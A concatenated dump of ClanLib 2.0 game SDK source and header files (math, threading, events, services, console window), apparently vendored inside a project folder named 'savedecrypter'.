| 30 | #include "Core/precomp.h" 31 | #include "API/Core/Math/triangle_math.h" 32 | 33 | template 34 | bool CL_Trianglex::point_inside( const CL_Vec2 &point ) const 35 | { 36 | Type b0 = (q.x - p.x) * (r.y - p.y) - (r.x - p.x) * (q.y - p.y); 37 | Type b1 = ((q.x - point.x) * (r.y - point.y) - (r.x - point.x) * (q.y - point.y)) / b0; 38 | Type b2 = ((r.x - point.x) * (p.y - point.y) - (p.x - point.x) * (r.y - point.y)) / b0; 39 | Type b3 = ((p.x - point.x) * (q.y - point.y) - (q.x - point.x) * (p.y - point.y)) / b0; 40 | 41 | Type zero = (Type) 0; 42 | if( (b1>zero && b2>zero && b3>zero) || ((b1>=zero && b2>=zero && b3>=zero) && b1+b2+b3 > zero) ) 43 | return true; 44 | 45 | return false; 46 | } 47 | 48 | // Explicit instantiate the versions we use: 49 | template class CL_Trianglex; 50 | template class CL_Trianglex; 51 | template class CL_Trianglex; 52 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/Math/vec1.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** Mark Page 28 | ** (if your name is missing here, please add it) 29 | */ 30 | 31 | #include "Core/precomp.h" 32 | #include "API/Core/Math/vec1.h" 33 | 34 | // Explicit instantiate the versions we use: 35 | template class CL_Vec1; 36 | template class CL_Vec1; 37 | template class CL_Vec1; 38 | template class CL_Vec1; 39 | template class CL_Vec1; 40 | template class CL_Vec1; 41 | template class CL_Vec1; 42 | template class CL_Vec1; 43 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/Unix/event_provider_socketpair.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "API/Core/System/event_provider.h" 33 | #include "API/Core/System/mutex.h" 34 | 35 | class CL_EventProvider_Socketpair : public CL_EventProvider 36 | { 37 | /// \name Construction 38 | /// \{ 39 | 40 | public: 41 | CL_EventProvider_Socketpair(bool manual_reset, bool initial_state); 42 | 43 | ~CL_EventProvider_Socketpair(); 44 | 45 | 46 | /// \} 47 | /// \name Attributes 48 | /// \{ 49 | 50 | public: 51 | EventType get_event_type(int index); 52 | 53 | int get_event_handle(int index); 54 | 55 | int get_num_event_handles(); 56 | 57 | 58 | /// \} 59 | /// \name Operations 60 | /// \{ 61 | 62 | public: 63 | bool check_after_wait(int index); 64 | 65 | bool set(); 66 | 67 | bool reset(); 68 | 69 | 70 | /// \} 71 | /// \name Implementation 72 | /// \{ 73 | 74 | private: 75 | CL_Mutex mutex; 76 | 77 | bool manual_reset; 78 | 79 | bool state; 80 | 81 | int wait_sockets[2]; 82 | /// \} 83 | }; 84 | 85 | 86 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/Unix/init_linux.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | #pragma once 31 | 32 | 33 | #if _MSC_VER > 1000 34 | #pragma once 35 | #endif 36 | 37 | #include 38 | 39 | class CL_System_Unix 40 | { 41 | public: 42 | }; 43 | 44 | 45 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/Unix/service_unix.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | #include "../service_impl.h" 32 | #include "API/Core/System/event.h" 33 | 34 | class CL_Service_Unix : public CL_Service_Impl 35 | { 36 | /// \name Construction 37 | /// \{ 38 | public: 39 | CL_Service_Unix(CL_Service *service, const CL_String &service_name); 40 | virtual ~CL_Service_Unix(); 41 | /// \} 42 | 43 | /// \name Attributes 44 | /// \{ 45 | public: 46 | /// \} 47 | 48 | /// \name Operations 49 | /// \{ 50 | public: 51 | int main(int argc, char **argv); 52 | /// \} 53 | 54 | /// \name Implementation 55 | /// \{ 56 | private: 57 | int run_debug(std::vector args); 58 | int run_daemon(std::vector args); 59 | void service_thread_main(std::vector args); 60 | static void sig_term(int signal_code); 61 | static void sig_hup(int signal_code); 62 | 63 | CL_Event stop_event; 64 | CL_Event reload_event; 65 | /// \} 66 | }; 67 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/Unix/thread_unix.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "../thread_impl.h" 33 | 34 | #ifndef WIN32 35 | #ifndef __USE_UNIX98 36 | #define __USE_UNIX98 37 | #endif 38 | #include 39 | #endif 40 | 41 | class CL_Thread_Unix : public CL_Thread_Impl 42 | { 43 | /// \name Construction 44 | /// \{ 45 | 46 | public: 47 | CL_Thread_Unix(); 48 | 49 | ~CL_Thread_Unix(); 50 | 51 | 52 | /// \} 53 | /// \name Attributes 54 | /// \{ 55 | 56 | public: 57 | 58 | 59 | /// \} 60 | /// \name Operations 61 | /// \{ 62 | 63 | public: 64 | void start(CL_Runnable *runnable); 65 | 66 | void join(); 67 | 68 | 69 | /// \} 70 | /// \name Implementation 71 | /// \{ 72 | 73 | private: 74 | static void *thread_main(void *data); 75 | 76 | pthread_t handle; 77 | 78 | bool handle_valid; 79 | /// \} 80 | }; 81 | 82 | 83 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/Win32/event_provider_win32.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "API/Core/System/event_provider.h" 33 | 34 | class CL_EventProvider_Win32 : public CL_EventProvider 35 | { 36 | /// \name Construction 37 | /// \{ 38 | 39 | public: 40 | CL_EventProvider_Win32(bool manual_reset, bool initial_state); 41 | 42 | ~CL_EventProvider_Win32(); 43 | 44 | 45 | /// \} 46 | /// \name Attributes 47 | /// \{ 48 | 49 | public: 50 | EventType get_event_type(int index); 51 | 52 | HANDLE get_event_handle(int index); 53 | 54 | int get_num_event_handles(); 55 | 56 | 57 | /// \} 58 | /// \name Operations 59 | /// \{ 60 | 61 | public: 62 | bool set(); 63 | 64 | bool reset(); 65 | 66 | 67 | /// \} 68 | /// \name Implementation 69 | /// \{ 70 | 71 | private: 72 | HANDLE handle; 73 | /// \} 74 | }; 75 | 76 | 77 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/Win32/init_win32.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | #pragma once 31 | 32 | #include "API/Core/System/system.h" 33 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/Win32/thread_win32.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "../thread_impl.h" 33 | 34 | class CL_Thread_Win32 : public CL_Thread_Impl 35 | { 36 | /// \name Construction 37 | /// \{ 38 | 39 | public: 40 | CL_Thread_Win32(); 41 | 42 | ~CL_Thread_Win32(); 43 | 44 | 45 | /// \} 46 | /// \name Attributes 47 | /// \{ 48 | 49 | public: 50 | 51 | 52 | /// \} 53 | /// \name Operations 54 | /// \{ 55 | 56 | public: 57 | void start(CL_Runnable *runnable); 58 | 59 | void join(); 60 | 61 | 62 | /// \} 63 | /// \name Implementation 64 | /// \{ 65 | 66 | private: 67 | static DWORD WINAPI thread_main(void *data); 68 | 69 | HANDLE handle; 70 | /// \} 71 | }; 72 | 73 | 74 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/console_window.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | #include "Core/precomp.h" 31 | #include "API/Core/System/console_window.h" 32 | #include "console_window_generic.h" 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | // CL_ConsoleWindow construction: 36 | 37 | CL_ConsoleWindow::CL_ConsoleWindow( 38 | const CL_StringRef &title, 39 | int width, 40 | int height) 41 | : impl(NULL) 42 | { 43 | impl = new CL_ConsoleWindow_Generic(title, width, height); 44 | } 45 | 46 | CL_ConsoleWindow::~CL_ConsoleWindow() 47 | { 48 | delete impl; 49 | } 50 | 51 | ///////////////////////////////////////////////////////////////////////////// 52 | // CL_ConsoleWindow operations: 53 | 54 | void CL_ConsoleWindow::wait_for_key() 55 | { 56 | impl->wait_for_key(); 57 | } 58 | 59 | void CL_ConsoleWindow::display_close_message() 60 | { 61 | impl->display_close_message(); 62 | } 63 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/console_window_generic.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** Harry Storbacka 28 | */ 29 | 30 | #pragma once 31 | 32 | #include 33 | #include 34 | 35 | class CL_ConsoleWindow_Generic 36 | { 37 | /// \name Construction 38 | /// \{ 39 | 40 | public: 41 | CL_ConsoleWindow_Generic( 42 | const CL_StringRef &title, 43 | int width, 44 | int height); 45 | 46 | ~CL_ConsoleWindow_Generic(); 47 | 48 | 49 | /// \} 50 | /// \name Operations 51 | /// \{ 52 | 53 | public: 54 | void wait_for_key(); 55 | 56 | void display_close_message(); 57 | 58 | 59 | /// \} 60 | /// \name Implementation 61 | /// \{ 62 | 63 | private: 64 | /// \} 65 | }; 66 | 67 | 68 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/disposable_object.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #include "Core/precomp.h" 30 | #include "API/Core/System/disposable_object.h" 31 | #include "API/Core/System/exception.h" 32 | 33 | CL_DisposableObject::CL_DisposableObject() 34 | : disposed(false) 35 | { 36 | } 37 | 38 | void CL_DisposableObject::dispose() 39 | { 40 | if (!disposed) 41 | on_dispose(); 42 | disposed = true; 43 | } 44 | 45 | void CL_DisposableObject::throw_if_disposed() const 46 | { 47 | if (is_disposed()) 48 | throw CL_Exception("Object was disposed"); 49 | } 50 | 51 | bool CL_DisposableObject::is_disposed() const 52 | { 53 | return disposed; 54 | } 55 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/event_impl.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #include "Core/precomp.h" 30 | #include "API/Core/System/event_provider.h" 31 | #include "event_impl.h" 32 | 33 | ///////////////////////////////////////////////////////////////////////////// 34 | // CL_Event_Impl Construction: 35 | 36 | CL_Event_Impl::CL_Event_Impl(CL_EventProvider *event_provider) 37 | : provider(event_provider) 38 | { 39 | } 40 | 41 | CL_Event_Impl::~CL_Event_Impl() 42 | { 43 | delete provider; 44 | } 45 | 46 | ///////////////////////////////////////////////////////////////////////////// 47 | // CL_Event_Impl Attributes: 48 | 49 | ///////////////////////////////////////////////////////////////////////////// 50 | // CL_Event_Impl Operations: 51 | 52 | ///////////////////////////////////////////////////////////////////////////// 53 | // CL_Event_Impl Implementation: 54 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/event_impl.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | class CL_EventProvider; 33 | 34 | class CL_Event_Impl 35 | { 36 | /// \name Construction 37 | /// \{ 38 | 39 | public: 40 | CL_Event_Impl(CL_EventProvider *event_provider); 41 | 42 | ~CL_Event_Impl(); 43 | 44 | 45 | /// \} 46 | /// \name Attributes 47 | /// \{ 48 | 49 | public: 50 | CL_EventProvider *provider; 51 | 52 | 53 | /// \} 54 | /// \name Operations 55 | /// \{ 56 | 57 | public: 58 | 59 | 60 | /// \} 61 | /// \name Implementation 62 | /// \{ 63 | 64 | private: 65 | /// \} 66 | }; 67 | 68 | 69 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/runnable.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #include "Core/precomp.h" 30 | #include "API/Core/System/runnable.h" 31 | #include "API/Core/System/thread.h" 32 | 33 | ///////////////////////////////////////////////////////////////////////////// 34 | // CL_Runnable Construction: 35 | 36 | CL_Runnable::CL_Runnable() 37 | { 38 | } 39 | 40 | CL_Runnable::~CL_Runnable() 41 | { 42 | } 43 | 44 | ///////////////////////////////////////////////////////////////////////////// 45 | // CL_Runnable Attributes: 46 | 47 | ///////////////////////////////////////////////////////////////////////////// 48 | // CL_Runnable Operations: 49 | 50 | void CL_Runnable::set_thread_name(const char *name) 51 | { 52 | CL_Thread::set_thread_name(name); 53 | } 54 | 55 | ///////////////////////////////////////////////////////////////////////////// 56 | // CL_Runnable Implementation: 57 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/service_impl.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "API/Core/Signals/signal_v1.h" 33 | 34 | class CL_Event; 35 | class CL_Service; 36 | 37 | class CL_Service_Impl 38 | { 39 | /// \name Construction 40 | /// \{ 41 | 42 | public: 43 | CL_Service_Impl(CL_Service *service, const CL_String &service_name); 44 | 45 | virtual ~CL_Service_Impl(); 46 | 47 | 48 | /// \} 49 | /// \name Attributes 50 | /// \{ 51 | 52 | public: 53 | CL_String service_name; 54 | 55 | CL_Service *service; 56 | 57 | static CL_Service_Impl *instance; 58 | 59 | 60 | /// \} 61 | /// \name Operations 62 | /// \{ 63 | 64 | public: 65 | virtual int main(int argc, char **argv) = 0; 66 | 67 | void service_start(std::vector &args); 68 | 69 | void service_stop(); 70 | 71 | void service_reload(); 72 | 73 | 74 | /// \} 75 | /// \name Implementation 76 | /// \{ 77 | 78 | private: 79 | /// \} 80 | }; 81 | 82 | 83 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/setup_core.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #include "Core/precomp.h" 30 | #include "API/Core/System/setup_core.h" 31 | #include "API/Core/System/exception.h" 32 | #include "API/Core/System/thread_local_storage.h" 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | // CL_SetupCore Construction: 36 | 37 | CL_SetupCore::CL_SetupCore() 38 | { 39 | CL_ThreadLocalStorage::create_initial_instance(); 40 | #ifndef CL_DISABLE_SSE2 41 | if (!CL_System::detect_cpu_extension(CL_System::sse2)) 42 | { 43 | throw CL_Exception("Sorry, ClanLib 2.2 and higher requires a processor capable of SSE2 instructions. (Update your CPU)"); 44 | } 45 | #endif 46 | } 47 | 48 | CL_SetupCore::~CL_SetupCore() 49 | { 50 | } 51 | 52 | ///////////////////////////////////////////////////////////////////////////// 53 | // CL_SetupCore Implementation: 54 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/Core/System/thread_impl.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source 